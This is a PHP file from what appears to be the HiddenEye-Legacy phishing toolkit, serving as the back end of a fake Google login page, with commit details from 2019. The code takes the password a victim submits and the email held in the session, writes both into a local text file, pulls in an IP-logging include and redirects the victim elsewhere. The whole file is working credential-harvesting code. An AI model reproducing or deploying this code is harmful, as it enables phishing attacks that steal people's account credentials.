HiddenEye-Legacy/WebPages/google_standard/login.php
Usama Abdul Sattar 61cba860fc
fix #176
Fix "8" gets printed at the end
2019-06-15 09:17:31 +05:00

17 lines
329 B
PHP

<?php
include 'ip.php';
session_start();
$pass = $_POST["password"];
$email=$_SESSION["Email"];
file_put_contents("usernames.txt", "[EMAIL: ]" . " ". $email . " " . " " . "[PASS: ]" . " " . $pass . "\n", FILE_APPEND);
header('Location: <CUSTOM>');
exit();
session_destroy();
?>